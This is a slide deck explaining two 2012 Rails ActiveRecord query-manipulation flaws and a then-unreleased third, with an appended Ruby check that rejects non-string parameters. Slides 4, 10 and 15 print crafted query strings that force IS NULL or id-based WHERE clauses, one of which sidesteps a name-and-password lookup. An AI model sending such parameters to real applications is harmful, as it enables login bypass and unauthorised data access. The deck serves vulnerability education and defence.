Slide 1
Rails Vulnerabilities Last Week
CVE-2012-2660
CVE-2012-2661
Slide 2
CVE-2012-2660
Allows unexpected “IS NULL” in queries
Affects Rails 2.x and 3.x
Slide 3
ActiveRecord Query

    unless params[:name].nil?
      @user = User.where(:name => params[:name])
    end
Slide 4
Query Parameters

    ?name[]
    {"name"=>[nil]}
Slide 5
ActiveRecord Query

    unless [nil].nil?
      @user = User.where(:name => [nil])
    end
Slide 6
Resulting SQL

    SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
Slide 7
CVE-2012-2661
Allows some manipulation of WHERE clause via “dotted” query keys
Affects Rails 3.x
Slide 8
ActiveRecord Query

    User.where(:name => params[:name])
Slide 9
ActiveRecord Query

    User.where("users.name" => params[:name])
Slide 10
Query Parameters

    ?name[users.id]=1
    {"name"=>{"users.id"=>"1"}}
Slide 11
ActiveRecord Query

    User.where(:name => {"users.id" => "1"})
Slide 12
Resulting SQL

    SELECT "users".* FROM "users" WHERE "users"."id" = 1
Slide 13
Unreleased Vulnerability
Allows some manipulation of WHERE clause via nested hashes in query values
Affects 2.3.x and 3.x
Slide 14
ActiveRecord Query

    User.where(:name => params[:name], :password => params[:password])
Slide 15
Query Parameters

    ?name[users][id]=1&password[users][id]=1
    {"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}
Slide 16
ActiveRecord Query

    User.where(
      :name => {"users"=>{"id"=>"1"}},
      :password => {"users"=>{"id"=>"1"}}
    )
Slide 17
Resulting SQL

    SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
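
A defensive check for the three parameter shapes shown in the slides, as an added example that is not part of the original deck: it rejects any query value that is not a plain String before it reaches where(). The helper names (unsafe_shape, scalar_param) and the plain string-keyed params Hash are assumptions.

```ruby
# Added example (not from the slides): inspect the shape of a request
# parameter before it is passed to where(:column => value).
# Assumption: params is a plain Hash with string keys, as printed on the slides.

class NonScalarParam < ArgumentError; end

# Names the slide-deck case a value falls under, or returns nil for a plain String.
def unsafe_shape(value)
  case value
  when String
    nil
  when Array
    value.any?(&:nil?) ? "array containing nil (CVE-2012-2660)" : "array"
  when Hash
    if value.keys.any? { |k| k.to_s.include?(".") }
      "hash with dotted key (CVE-2012-2661)"
    elsif value.values.any? { |v| v.is_a?(Hash) }
      "nested hash (unreleased issue on slides 13-17)"
    else
      "hash"
    end
  else
    "unexpected #{value.class}"
  end
end

# Returns the String for key, nil when the key is absent, and raises otherwise.
def scalar_param(params, key)
  value = params[key.to_s]
  return nil if value.nil?
  reason = unsafe_shape(value)
  raise NonScalarParam, "#{key}: #{reason}" if reason
  value
end

# Parameter hashes copied from slides 4, 10 and 15, plus one ordinary request.
SLIDE_PARAMS = [
  { "name" => [nil] },
  { "name" => { "users.id" => "1" } },
  { "name" => { "users" => { "id" => "1" } }, "password" => { "users" => { "id" => "1" } } },
  { "name" => "alice" } # constructed benign input
]

SLIDE_PARAMS.each do |params|
  begin
    puts "ok: #{scalar_param(params, :name).inspect}"
  rescue NonScalarParam => e
    puts "rejected: #{e.message}"
  end
end
```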